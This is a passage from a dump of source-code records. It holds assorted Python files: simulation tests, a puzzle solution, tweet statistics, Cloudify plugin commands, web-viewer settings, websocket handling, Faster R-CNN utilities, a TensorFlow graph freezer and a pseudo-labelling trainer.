at columns 5..8 of the squid rows 2 and 5\n        for i in range(5, 9):\n            self.assertTrue(len(sea.list_things_at((i, 2))) == 1)\n            self.assertTrue(len(sea.list_things_at((i, 5))) == 1)\n\n        for i in range(0, 50):\n            self.assertTrue(isinstance(sea.list_things_at((i, 3))[0], Obstacle))\n\n\n    def test_moving_cachalot(self):\n        l.info('test_moving_cachalot')\n\n        e = Sea(options)\n        a = Agent()\n        e.add_thing(a, (1, 1))\n\n        self.assertTrue(a.location == (1, 1))\n        e.execute_action(a, 'DiveAndForward', 1)\n        self.assertTrue(a.location == (2, 2))\n\n        # Should hit the wall\n        e.execute_action(a, 'DiveAndForward', 1)\n        self.assertTrue(a.location == (3, 2))\n\n        e.execute_action(a, 'Forward', 1)\n        self.assertTrue(a.location == (4, 2))\n\n        e.execute_action(a, 'UpAndforward', 1)\n        self.assertTrue(a.location == (5, 1))\n\n        # check that the world is a torus, should get back to the same location\n        for _ in range(0, 50):\n            e.execute_action(a, 'Forward', 1)\n\n        self.assertTrue(a.location == (5, 1))\n\n    def test_singing_cachalot(self):\n        l.info('test_singing_cachalot')\n\n        e = Sea(options)\n        a = Agent()\n        e.add_thing(a, (1, 1))\n\n        # song at time=1 will be heard by other agents at time=2\n        e.execute_ns_action(a, 'sign', 1)\n        self.assertTrue(len(e.list_ns_artifacts_at(2)) == 1)\n\n\n    def tearDown(self):\n        l.info('...done with test_sea.')\n\n\n# Main\n# ====\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"cachalot/test/test_sea.py","file_name":"test_sea.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
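# A quick self-contained check of the lane layout assumed by test_add_squid in
# test_sea.py above: in each 50-character squid row the 's' cells sit at columns
# 5..8 and 35..38, which is the range the test iterates over. Illustrative only;
# lane_row is rebuilt here rather than imported from the test module.
lane_row = 'w' * 5 + 's' * 4 + 'w' * 26 + 's' * 4 + 'w' * 11
assert [i for i, c in enumerate(lane_row) if c == 's'] == list(range(5, 9)) + list(range(35, 39))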
+{"seq_id":"277369398","text":"import sys\nsys.stdin = open('input.txt','r')\n\nN, M = map(int,input().split())\nmap = []\nfor i in range(N):\n    l = input()\n    templ = []\n    for j in range(M):\n        templ.append(l[j])\n    map.append(templ)\n# for a in map: print(*a)\n\ndef check(i,j,li):\n    global broken\n    for c in li:\n        if c == '1' :\n            if map[i-1][j] == '.':\n                broken.append([(i-1,j),i,j])\n        elif c == '2' :\n            if map[i][j+1] == '.':\n                broken.append([(i,j+1),i,j])\n        elif c == '3' :\n            if map[i+1][j] == '.':\n                broken.append([(i+1,j),i,j])\n        elif c == '4' :\n            if map[i][j-1] == '.':\n                broken.append([(i,j-1),i,j])\n\nbroken = []\nfor i in range(N):\n    for j in range(M):\n        point = map[i][j]\n        if point == chr(124) : check(i,j,['1','3'])\n        elif point == '-' : check(i,j,['2','4'])\n        elif point == '+' : check(i,j,['1','2','3','4'])\n        elif point == '1' : check(i,j,['2','3'])\n        elif point == '2' : check(i,j,['1','2'])\n        elif point == '3' : check(i,j,['1','4'])\n        elif point == '4' : check(i,j,['3','4'])\n\n# print(broken)\nfix = set()\ndi, dj = [-1,0,1,0],[0,1,0,-1]\nbi, bj = broken[0][0][0],broken[0][0][1]\nif len(broken) == 4:\n    # output is 1-indexed, matching the prints below\n    print(bi+1,bj+1,'+')\nelse:\n    for d in range(4):\n        ci, cj = bi+di[d] , bj+dj[d]\n        if 0 <= ci < N and 0 <= cj < M :\n            for cij in broken:\n                if cij[1] == ci and cij[2] == cj :\n                    fix.add(d+1)\n# print(fix)\nif fix == {1,3} : print(bi+1,bj+1,chr(124))\nelif fix == {2,4} : print(bi+1,bj+1,'-')\nelif fix == {2,3} : print(bi+1,bj+1,1)\nelif fix == {1,2} : print(bi+1,bj+1,2)\nelif fix == {1,4} : print(bi+1,bj+1,3)\nelif fix == {3,4} : print(bi+1,bj+1,4)","sub_path":"ForNovTest/BeakJoon/2931.py","file_name":"2931.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"102063556","text":"import sys, math\nfrom collections import defaultdict as dd\n\ndef mean(scores):\n    total = 0.0\n    for score in scores:\n        total += score\n    return total * 1.0 /len(scores)\n\ndef variance(scores, mu):\n    sigma = 0\n    for score in scores:\n        sigma += math.pow(score-mu,2)\n    return math.sqrt(sigma*1.0/len(scores))\n\nclass perUserStats:\n    def __init__(self):\n        self._userWise = dd(list)\n        self._tweets = []\n        self._scores = []\n        self._correct = []\n        self._mean = dd(float)\n        self._variance = dd(float)\n\n    def classScore(self, score):\n        score = float(score)\n        if score > 0:\n            return '1'\n        else:\n            return '-1'\n\n    def loadScores(self, scoredTweets, userIds):\n        self._scores = [float(s.strip().split('\\t')[1]) for s in open(scoredTweets)]\n        self._tweets = ['\\t'.join(s.strip().split('\\t')[3:]) for s in open(scoredTweets)]\n        self._correct = map(lambda x:x[0]==self.classScore(x[1]),[s.strip().split('\\t')[:2] for s in open(scoredTweets)])\n        ids = [i.strip().split('\\t')[0] for i in open(userIds)]\n        for index in range(len(self._scores)):\n            self._userWise[ids[index]].append((self._tweets[index],self._scores[index], self._correct[index]))\n\n    def meanAnalysis(self, outputFile):\n        outputFile = open(outputFile,'w')\n        for user in self._userWise.iterkeys():\n            totalOutside = 0\n            userMean = mean(map(lambda x:x[1],self._userWise[user]))\n            userVar = variance(map(lambda x:x[1], self._userWise[user]), userMean)\n            userPos = []\n            userNeg = []\n            userMid = []\n            sys.stderr.write(\"User Mean:\"+str(userMean)+\"\\t User Variance:\"+str(userVar)+'\\n')\n            for (tweet,score,correct) in self._userWise[user]:\n                if not correct:\n                    continue\n                if score > userMean + 2*userVar:\n                    userPos.append(tweet)\n                    totalOutside += 1\n                if score < userMean - 2 * userVar:\n                    userNeg.append(tweet)\n                    totalOutside += 1\n                if (score > userMean and score < userMean + 0.5*userVar) or (score < userMean and score > userMean - 0.5*userVar):\n                    userMid.append(tweet)\n\n            outputFile.write('-'*60+'\\n')\n            outputFile.write(\"User Id:\" + str(user)+ \" has \" + str(totalOutside) + \" tweets outside of 2 StDs out of \" + str(len(self._userWise[user]))+'\\n')\n            outputFile.write('-'*60+'\\n\\n')\n            outputFile.write('Positive(AAE):\\n')\n            outputFile.write('\\n'.join(userPos)+'\\n\\n')\n            outputFile.write('Middle:\\n')\n            outputFile.write('\\n'.join(userMid[:5])+'\\n\\n')\n            outputFile.write('Negative(MSE):\\n')\n            outputFile.write('\\n'.join(userNeg)+'\\n\\n')\n        outputFile.close()\n\nif __name__ == \"__main__\":\n    scoredTweets = \"/usr0/home/pgadde/Work/Ethnic/AAEness/Exp/Social/Users/Data/annotatedTweets.tsv.scored\"\n    userIds = \"/usr0/home/pgadde/Work/Ethnic/AAEness/Exp/Social/Users/Data/tweetsCleaned.txt\"\n    outputFile = \"/usr0/home/pgadde/Work/Ethnic/AAEness/Exp/Social/Users/Data/perUserStats.txt\"\n    P = perUserStats()\n    P.loadScores(scoredTweets, userIds)\n    P.meanAnalysis(outputFile) 
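# A hedged, vectorised numpy sketch of the same +/- 2 standard deviation outlier
# selection that meanAnalysis() performs per user above (illustrative only, not
# part of perUserStats.py; the helper name is an assumption).
import numpy as np

def outside_two_std(scores):
    scores = np.asarray(scores, dtype=float)
    mu, sigma = scores.mean(), scores.std()
    return scores[np.abs(scores - mu) > 2 * sigma]

assert list(outside_two_std([0.0] * 10 + [100.0])) == [100.0]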
\n","sub_path":"EthnicGroups/src/SocialContexts/perUserStats.py","file_name":"perUserStats.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"497845739","text":"########\n# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\n\"\"\"\nHandles all commands that start with 'cfy plugins'\n\"\"\"\nimport tarfile\n\nfrom cloudify_cli import utils\nfrom cloudify_cli import messages\nfrom cloudify_cli.logger import get_logger\nfrom cloudify_cli.utils import print_table\nfrom cloudify_cli.exceptions import CloudifyCliError\n\n\ndef validate(plugin_path):\n logger = get_logger()\n\n logger.info(\n messages.VALIDATING_PLUGIN.format(plugin_path.name))\n if not tarfile.is_tarfile(plugin_path.name):\n raise CloudifyCliError('Archive {0} is of an unsupported archive type.'\n ' Only tar.gz is allowed'\n .format(plugin_path.name))\n with tarfile.open(plugin_path.name, 'r') as tar:\n tar_members = tar.getmembers()\n package_json_path = '{0}/package.json'.format(tar_members[0].name)\n try:\n package_member = tar.getmember(package_json_path)\n except KeyError:\n raise CloudifyCliError(messages.VALIDATING_PLUGIN_FAILED\n .format(plugin_path, 'package.json was not '\n 'found in archive'))\n try:\n tar.extractfile(package_member).read()\n except:\n raise CloudifyCliError(messages.VALIDATING_PLUGIN_FAILED\n .format(plugin_path, 'unable to read '\n 'package.json'))\n\n logger.info(messages.VALIDATING_PLUGIN_SUCCEEDED)\n\n\ndef delete(plugin_id):\n logger = get_logger()\n management_ip = utils.get_management_server_ip()\n client = utils.get_rest_client(management_ip)\n\n logger.info(messages.PLUGIN_DELETE.format(plugin_id, management_ip))\n client.plugins.delete(plugin_id)\n\n logger.info(messages.PLUGIN_DELETE_SUCCEEDED.format(plugin_id))\n\n\ndef upload(plugin_path):\n server_ip = utils.get_management_server_ip()\n utils.upload_plugin(plugin_path, server_ip,\n utils.get_rest_client(server_ip), validate)\n\n\ndef download(plugin_id,\n output):\n logger = get_logger()\n management_ip = utils.get_management_server_ip()\n logger.info(messages.DOWNLOADING_PLUGIN.format(plugin_id))\n client = utils.get_rest_client(management_ip)\n target_file = client.plugins.download(plugin_id, output)\n logger.info(messages.DOWNLOADING_PLUGIN_SUCCEEDED.format(plugin_id,\n target_file))\n\n\nfields = ['id', 'package_name', 'package_version', 'supported_platform',\n 'distribution', 'distribution_release', 'uploaded_at']\n\n\ndef get(plugin_id):\n logger = get_logger()\n management_ip = utils.get_management_server_ip()\n client = utils.get_rest_client(management_ip)\n\n logger.info(messages.PLUGINS_GET.format(plugin_id, management_ip))\n plugin = client.plugins.get(plugin_id, _include=fields)\n\n pt = utils.table(fields, data=[plugin])\n print_table('Plugin:', pt)\n\n\ndef ls():\n logger = get_logger()\n management_ip = utils.get_management_server_ip()\n client = 
utils.get_rest_client(management_ip)\n\n logger.info(messages.PLUGINS_LIST.format(management_ip))\n plugins = client.plugins.list(_include=fields)\n\n pt = utils.table(fields, data=plugins)\n print_table('Plugins:', pt)\n","sub_path":"cloudify_cli/commands/plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"370975286","text":"from viewer.settings_common import *\n\nROOT_URL = '/'\nSTATIC_URL_PATH = 'static/'\nSTATIC_URL = ROOT_URL + STATIC_URL_PATH\n\nHOSTNAME = 'viewer.legacysurvey.org'\n#HOSTNAME = 'spin.legacysurvey.org'\nTILE_URL = 'https://{s}.%s%s{id}/{ver}/{z}/{x}/{y}.jpg' % (HOSTNAME, ROOT_URL)\n\nDEBUG = True\n\nDEBUG_LOGGING = True\n\nREAD_ONLY_BASEDIR = True\n\nUSER_QUERY_DIR = '/tmp/viewer-user'\n\nFORCE_SCRIPT_NAME = ROOT_URL\n\nSTATIC_TILE_URL_B = 'http://{s}.imagine.legacysurvey.org/static/tiles/{id}/{ver}/{z}/{x}/{y}.jpg'\nSUBDOMAINS_B = SUBDOMAINS\n\n# no CORS -- so don't use subdomains, or specify hostname (www.legacysurvey.org vs legacysurvey.org)\nCAT_URL = '%s/{id}/{ver}/{z}/{x}/{y}.cat.json' % (ROOT_URL)\n\nENABLE_DR5 = False\nENABLE_DR9 = True\nENABLE_DR9SV = False\nENABLE_OLDER = False\n# public version\nENABLE_SCIENCE = False\n\nENABLE_CUTOUTS = False\nENABLE_SPECTRA = False\nENABLE_DESI_TARGETS = False\n","sub_path":"viewer/settings_pr.py","file_name":"settings_pr.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"207130226","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport yaml as yml\n\n\ndef maintainers(pkgfile, repofile):\n with open(pkgfile) as p, open(repofile) as r:\n pkgs, repo = yml.load(p), yml.load(r)\n\n maints = set()\n for pkg, ver in pkgs.items():\n maints.add((pkg, ver, repo[pkg][ver]['maintainer']))\n return maints\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description='print maintainers')\n parser.add_argument('pkgfile', type=str)\n parser.add_argument('repofile', type=str)\n args = parser.parse_args()\n maints = maintainers(args.pkgfile, args.repofile)\n for pkg, ver, maintainer in maints:\n print('%s %s %s' % (pkg, ver, maintainer))\n","sub_path":"komodo/maintainer.py","file_name":"maintainer.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"278814087","text":"import time\nimport json\nimport hashlib\nimport logging\n\nfrom pulsar.apps import ws\nfrom builtins import isinstance\n\nLUX_CONNECTION = 'lux:connection_established'\nLUX_MESSAGE = 'lux:message'\nLUX_ERROR = 'lux:error'\n\nLOGGER = logging.getLogger('lux.sockjs')\n\n\nclass WsClient:\n '''Server side of a websocket client\n '''\n def __init__(self, transport, handler):\n request = transport.handshake\n self.transport = transport\n self.handler = handler\n self.started = time.time()\n self.address = request.get_client_address()\n session_id = request.urlargs.get('session_id')\n if not session_id:\n key = '%s - %s' % (self.address, self.started)\n session_id = hashlib.sha224(key.encode('utf-8')).hexdigest()\n self.session_id = session_id\n request.cache.websocket = self\n transport.on_open(self)\n\n def __str__(self):\n return '%s - %s' % (self.address, self.session_id)\n\n def __call__(self, channel, message):\n message = message.decode('utf-8')\n self.write(LUX_MESSAGE, channel, message)\n\n # 
Lux Implementation\n def write(self, event, channel=None, data=None, **kw):\n msg = {'event': event}\n if channel:\n msg['channel'] = channel\n if kw:\n if data:\n data.update(kw)\n else:\n data = kw\n if data:\n if not isinstance(data, str):\n data = json.dumps(data)\n msg['data'] = data\n array = [json.dumps(msg)]\n self.transport.write('a%s' % json.dumps(array))\n\n def error_message(self, ws, exc):\n msg = {'event': LUX_ERROR}\n code = getattr(exc, 'code', None)\n if code:\n msg['code'] = code\n msg['message'] = str(exc)\n\n\nclass LuxWs(ws.WS):\n '''Lux websocket\n '''\n pubsub = None\n\n def on_open(self, websocket):\n ws = WsClient(websocket, self)\n if self.pubsub:\n self.pubsub.add_client(ws)\n app = websocket.app\n app.fire('on_websocket_open', websocket, self)\n #\n # Send the LUX_CONNECTION event with socket id and start time\n ws.write(LUX_CONNECTION, socket_id=ws.session_id, time=ws.started)\n\n def on_message(self, websocket, message):\n ws = websocket.handshake.cache.websocket\n try:\n msg = json.loads(message)\n\n except Exception as exc:\n ws.error_message(exc)\n\n def on_close(self, websocket):\n ws = websocket.handshake.cache.websocket\n if self.pubsub:\n self.pubsub.remove_client(ws)\n LOGGER.info('closing socket %s', ws)\n","sub_path":"lux/extensions/sockjs/ws.py","file_name":"ws.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"316863943","text":"from typing import Union\nimport numpy as np\nimport torch\nfrom torchvision.ops import nms\n\nfrom face_detection.Config import cig\nfrom face_detection.utils.bbox import to_offsets, bbox_iou, to_real_bbox\n\ndef safe_to_numpy(data : Union[np.ndarray, torch.Tensor]) -> np.ndarray:\n if isinstance(data, np.ndarray):\n return data\n if isinstance(data, torch.Tensor):\n return data.detach().cpu().numpy()\n\ndef safe_to_tensor(data : Union[np.ndarray, torch.Tensor], use_cuda : bool = cig.use_cuda) -> torch.Tensor:\n if isinstance(data, np.ndarray):\n tensor = torch.from_numpy(data)\n if isinstance(data, torch.Tensor):\n tensor = data.detach()\n if use_cuda:\n tensor = tensor.cuda()\n return tensor\n\nclass ProposalTargetCreator(object):\n def __init__(self,\n n_sample=128,\n pos_ratio=0.25, pos_iou_thresh=0.5,\n neg_iou_thresh_hi=0.5, neg_iou_thresh_lo=0.0\n ):\n self.n_sample = n_sample # number of the bbox left\n self.pos_ratio = pos_ratio\n self.pos_iou_thresh = pos_iou_thresh\n self.neg_iou_thresh_hi = neg_iou_thresh_hi\n self.neg_iou_thresh_lo = neg_iou_thresh_lo # NOTE:default 0.1 in py-faster-rcnn\n\n def __call__(self, roi, bbox, label, loc_normalize_mean=(0., 0., 0., 0.), loc_normalize_std=(0.1, 0.1, 0.2, 0.2)):\n n_bbox, _ = bbox.shape\n roi = np.concatenate((roi, bbox), axis=0)\n\n pos_roi_per_image = np.round(self.n_sample * self.pos_ratio)\n iou = bbox_iou(roi, bbox)\n gt_assignment = iou.argmax(axis=1)\n max_iou = iou.max(axis=1)\n # Offset range of classes from [0, n_fg_class - 1] to [1, n_fg_class].\n # The label with value 0 is the background.\n gt_roi_label = label[gt_assignment] + 1\n\n # Select foreground RoIs as those with >= pos_iou_thresh IoU.\n pos_index = np.where(max_iou >= self.pos_iou_thresh)[0]\n pos_roi_per_this_image = int(min(pos_roi_per_image, pos_index.size))\n if pos_index.size > 0:\n pos_index = np.random.choice(\n pos_index, size=pos_roi_per_this_image, replace=False)\n\n # Select background RoIs as those within\n # [neg_iou_thresh_lo, neg_iou_thresh_hi).\n neg_index = np.where((max_iou < 
self.neg_iou_thresh_hi) &\n (max_iou >= self.neg_iou_thresh_lo))[0]\n neg_roi_per_this_image = self.n_sample - pos_roi_per_this_image\n neg_roi_per_this_image = int(min(neg_roi_per_this_image,\n neg_index.size))\n if neg_index.size > 0:\n neg_index = np.random.choice(\n neg_index, size=neg_roi_per_this_image, replace=False)\n\n # The indices that we're selecting (both positive and negative).\n keep_index = np.append(pos_index, neg_index)\n gt_roi_label = gt_roi_label[keep_index]\n gt_roi_label[pos_roi_per_this_image:] = 0 # negative labels --> 0\n sample_roi = roi[keep_index]\n\n # Compute offsets and scales to match sampled RoIs to the GTs.\n gt_roi_loc = to_offsets(sample_roi, bbox[gt_assignment[keep_index]])\n gt_roi_loc = ((gt_roi_loc - np.array(loc_normalize_mean, np.float32)) / np.array(loc_normalize_std, np.float32))\n\n return sample_roi, gt_roi_loc, gt_roi_label\n\n# assign anchor to target\nclass AnchorTargetCreator(object):\n def __init__(self, n_sample=256, pos_iou_thresh=0.7, neg_iou_thresh=0.3, pos_ratio=0.5):\n self.n_sample = n_sample\n self.pos_iou_thresh = pos_iou_thresh\n self.neg_iou_thresh = neg_iou_thresh\n self.pos_ratio = pos_ratio\n\n def __call__(self, bbox, anchor, img_size):\n img_H, img_W = img_size\n n_anchor = len(anchor)\n inside_index = _get_inside_index(anchor, img_H, img_W)\n anchor = anchor[inside_index]\n argmax_ious, label = self._create_label(\n inside_index, anchor, bbox)\n\n # compute bounding box regression targets\n loc = to_offsets(anchor, bbox[argmax_ious])\n\n # map up to original set of anchors\n label = _unmap(label, n_anchor, inside_index, fill=-1)\n loc = _unmap(loc, n_anchor, inside_index, fill=0)\n\n return loc, label\n\n def _create_label(self, inside_index, anchor, bbox):\n # label: 1 is positive, 0 is negative, -1 is dont care\n label = np.empty((len(inside_index),), dtype=np.int32)\n label.fill(-1)\n\n argmax_ious, max_ious, gt_argmax_ious = \\\n self._calc_ious(anchor, bbox, inside_index)\n\n # assign negative labels first so that positive labels can clobber them\n label[max_ious < self.neg_iou_thresh] = 0\n\n # positive label: for each gt, anchor with highest iou\n label[gt_argmax_ious] = 1\n\n # positive label: above threshold IOU\n label[max_ious >= self.pos_iou_thresh] = 1\n\n # subsample positive labels if we have too many\n n_pos = int(self.pos_ratio * self.n_sample)\n pos_index = np.where(label == 1)[0]\n if len(pos_index) > n_pos:\n disable_index = np.random.choice(\n pos_index, size=(len(pos_index) - n_pos), replace=False)\n label[disable_index] = -1\n\n # subsample negative labels if we have too many\n n_neg = self.n_sample - np.sum(label == 1)\n neg_index = np.where(label == 0)[0]\n if len(neg_index) > n_neg:\n disable_index = np.random.choice(\n neg_index, size=(len(neg_index) - n_neg), replace=False)\n label[disable_index] = -1\n\n return argmax_ious, label\n\n def _calc_ious(self, anchor, bbox, inside_index):\n # ious between the anchors and the gt boxes\n ious = bbox_iou(anchor, bbox)\n argmax_ious = ious.argmax(axis=1)\n max_ious = ious[np.arange(len(inside_index)), argmax_ious]\n gt_argmax_ious = ious.argmax(axis=0)\n gt_max_ious = ious[gt_argmax_ious, np.arange(ious.shape[1])]\n gt_argmax_ious = np.where(ious == gt_max_ious)[0]\n\n return argmax_ious, max_ious, gt_argmax_ious\n\n\ndef _unmap(data, count, index, fill=0):\n # Unmap a subset of item (data) back to the original set of items (of\n # size count)\n\n if len(data.shape) == 1:\n ret = np.empty((count,), dtype=data.dtype)\n ret.fill(fill)\n ret[index] = 
data\n    else:\n        ret = np.empty((count,) + data.shape[1:], dtype=data.dtype)\n        ret.fill(fill)\n        ret[index, :] = data\n    return ret\n\n\ndef _get_inside_index(anchor, H, W):\n    # Calculate indices of anchors which are located completely inside of the image\n    # whose size is specified.\n    index_inside = np.where(\n        (anchor[:, 0] >= 0) &\n        (anchor[:, 1] >= 0) &\n        (anchor[:, 2] <= W) &\n        (anchor[:, 3] <= H)\n    )[0]\n    return index_inside\n\n\nclass ProposalCreator:\n    def __init__(self,\n                 parent_model,\n                 nms_thresh=0.7,\n                 n_train_pre_nms=12000,\n                 n_train_post_nms=2000,\n                 n_test_pre_nms=6000,\n                 n_test_post_nms=300,\n                 min_size=16\n                 ):\n        self.parent_model = parent_model\n        self.nms_thresh = nms_thresh\n        self.n_train_pre_nms = n_train_pre_nms\n        self.n_train_post_nms = n_train_post_nms\n        self.n_test_pre_nms = n_test_pre_nms\n        self.n_test_post_nms = n_test_post_nms\n        self.min_size = min_size\n\n    def __call__(self, loc, score, anchor, img_size, scale=1.):\n        if self.parent_model.training:\n            n_pre_nms = self.n_train_pre_nms\n            n_post_nms = self.n_train_post_nms\n        else:\n            n_pre_nms = self.n_test_pre_nms\n            n_post_nms = self.n_test_post_nms\n\n        # Convert anchors into proposals via bbox transformations.\n        roi = to_real_bbox(anchor, loc)\n\n        # Clip predicted boxes to image.\n        roi[:, slice(0, 4, 2)] = np.clip(roi[:, slice(0, 4, 2)], 0, img_size[0])\n        roi[:, slice(1, 4, 2)] = np.clip(roi[:, slice(1, 4, 2)], 0, img_size[1])\n\n        # Remove predicted boxes with either height or width < threshold.\n        min_size = self.min_size * scale\n        hs = roi[:, 3] - roi[:, 1]\n        ws = roi[:, 2] - roi[:, 0]\n        keep = np.where((hs >= min_size) & (ws >= min_size))[0]\n        roi = roi[keep, :]\n        score = score[keep]\n\n        # Sort all (proposal, score) pairs by score from highest to lowest.\n        # Take top pre_nms_topN (e.g. 6000).\n        order = score.ravel().argsort()[::-1]\n        if n_pre_nms > 0:\n            order = order[:n_pre_nms]\n        roi = roi[order, :]\n        score = score[order]\n        # Apply nms (e.g. threshold = 0.7).\n        # Take after_nms_topN (e.g. 300).\n\n        # unNOTE: something is wrong here!\n        # TODO: remove cuda.to_gpu\n        keep = nms(\n            torch.from_numpy(roi).cuda() if cig.use_cuda else torch.from_numpy(roi).cpu(),\n            torch.from_numpy(score).cuda() if cig.use_cuda else torch.from_numpy(score).cpu(),\n            self.nms_thresh\n        )\n        if n_post_nms > 0:\n            keep = keep[:n_post_nms]\n        roi = roi[keep.cpu().numpy()]\n        return roi\n","sub_path":"face_detection/utils/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":9249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"390639317","text":"import tensorflow as tf\n\nimport argparse\n\n# command line arguments\nparser = argparse.ArgumentParser(\n    description='Convert a checkpoint to frozen graph')\nparser.add_argument(\n    '--checkpoint',\n    type=str,\n    default=\"model.ckpt\",\n    help='The checkpoint file to be converted')\nparser.add_argument(\n    '--graph',\n    type=str,\n    default=\"graph.pb\",\n    help='Output graph name.')\n\nargs = parser.parse_args()\n\n\n# add pb extension if not present\nif not args.graph.endswith(\".pb\"):\n    args.graph = args.graph + \".pb\"\n\n# build the graph from the checkpoint's meta file; import_meta_graph returns a\n# saver for it (tf.train.Saver() on an empty default graph raises ValueError)\nsaver = tf.train.import_meta_graph(args.checkpoint + \".meta\")\n\nwith tf.Session() as sess:\n    # restore all variables from checkpoint\n    saver.restore(sess, args.checkpoint)\n\n    # nodes that are the required output nodes\n    output_node_names = [\"Openpose/concat_stage7\"]\n\n    # We use a built-in TF helper to export variables to constants\n    output_graph_def = tf.graph_util.convert_variables_to_constants(\n        sess,\n        tf.get_default_graph().as_graph_def(),\n        # The graph_def is used to retrieve the nodes\n        output_node_names  # The output node names are used to select the useful nodes\n    )\n\n    # convert variables to constants\n    output_graph_def = tf.graph_util.remove_training_nodes(output_graph_def)\n\n    # Finally we serialize and dump the output graph to the filesystem\n    output_graph = args.graph\n    with tf.gfile.GFile(output_graph, \"wb\") as f:\n        f.write(output_graph_def.SerializeToString())\n\n    print(\"Frozen graph file {} created successfully\".format(args.graph))","sub_path":"tensorflow_checkpoint_to_graph.py","file_name":"tensorflow_checkpoint_to_graph.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"382004131","text":"# -*- coding: utf-8 -*-\n# @Time    : 18-8-11 6:54 PM\n# @Author  : unicoe\n# @Email   : unicoe@163.com\n# @File    : draw_loss.py\n# @Software: PyCharm Community Edition\n\nimport re\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pdb\n\nrf = open(\"/home/user/PycharmProjects/setting_weight_by_learn/src/loss.txt\")\n\ncontent = rf.readline()\n\nresult = []\n\nwhile content:\n    # escape the dot so it only matches a literal decimal point\n    res = re.findall(\"\\\[\\\d\\\.\\\d+\\\]\",content)\n\n    if len(res) != 0:\n        # strip the surrounding brackets, e.g. '[0.123]' -> '0.123'\n        tmp = res[0][1:-1]\n        result.append(float(tmp))\n    content = rf.readline()\n\ndraw_train_all_loss = pd.Series(result, index = range(0,len(result),1))\n\n#draw\nfig = plt.figure()\nw = 25\nh = 10\nfig.set_size_inches(w,h)\n\nplt.plot(draw_train_all_loss,'r')\nplt.title(u\"all loss\")\n#plt.legend((u'accuracy'),loc='best')\nplt.xlabel(u\"iter\")\nplt.ylabel(u\"loss\")\n\n\nplt.savefig(\"/home/user/PycharmProjects/setting_weight_by_learn/img/loss_add_wegiht_08_11.png\")\n#save format maybe : format=\"eps\" or 
\"pdf\"\n\n\nplt.show()\n","sub_path":"some_learn/Data_Set_handle/Caltech-Dateset/setting_weight_by_learn/src/pdb_learn_draw_loss.py","file_name":"pdb_learn_draw_loss.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"62834005","text":"import pickle\nfrom collections import defaultdict\nfrom pathlib import Path\nfrom typing import Optional, Callable\n\nimport numpy as np\nimport torch\nimport torch.utils.data as torchdata\nfrom ignite.contrib.handlers import ProgressBar\nfrom ignite.engine import create_supervised_evaluator, Events, Engine\nfrom ignite.metrics import Accuracy, Loss\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom alr import ALRModel\nfrom alr import MCDropout\nfrom alr.acquisition import BALD\nfrom alr.data import DataManager\nfrom alr.data import RelabelDataset, PseudoLabelDataset, UnlabelledDataset\nfrom alr.data.datasets import Dataset\nfrom alr.training import Trainer\nfrom alr.training.samplers import RandomFixedLengthSampler\nfrom alr.training.utils import EarlyStopper, PLPredictionSaver\nfrom alr.utils import eval_fwd_exp, timeop, manual_seed\nfrom alr.utils._type_aliases import _DeviceType, _Loss_fn\n\n\nclass PseudoLabelManager:\n def __init__(\n self,\n pool: UnlabelledDataset,\n model: nn.Module,\n threshold: float,\n log_dir: Optional[str] = None,\n device: _DeviceType = None,\n **kwargs,\n ):\n bs = kwargs.pop(\"batch_size\", 1024)\n shuffle = kwargs.pop(\"shuffle\", False)\n assert not shuffle\n self._pool = pool\n self._loader = torchdata.DataLoader(\n pool, batch_size=bs, shuffle=shuffle, **kwargs\n )\n self._model = model\n self._log_dir = log_dir\n self._device = device\n self._threshold = threshold\n self.acquired_sizes = []\n\n def attach(self, engine: Engine):\n engine.add_event_handler(Events.STARTED, self._initialise)\n # could also be EPOCH_COMPLETED since there's only one iteration in each epoch\n engine.add_event_handler(Events.ITERATION_COMPLETED, self._load_labels)\n\n def _load_labels(self, engine: Engine):\n evaluator = create_supervised_evaluator(\n self._model, metrics=None, device=self._device\n )\n plc = PseudoLabelCollector(\n self._threshold,\n log_dir=self._log_dir,\n )\n plc.attach(evaluator, batch_size=self._loader.batch_size)\n plc.global_step_from_engine(engine)\n evaluator.run(self._loader)\n indices, pseudo_labels = (\n evaluator.state.pl_indices.cpu().numpy(),\n evaluator.state.pl_plabs.cpu().numpy(),\n )\n self.acquired_sizes.append(indices.shape[0])\n if indices.shape[0]:\n confident_points = torchdata.Subset(self._pool, indices)\n if self._pool.debug:\n # pool returns target labels too\n 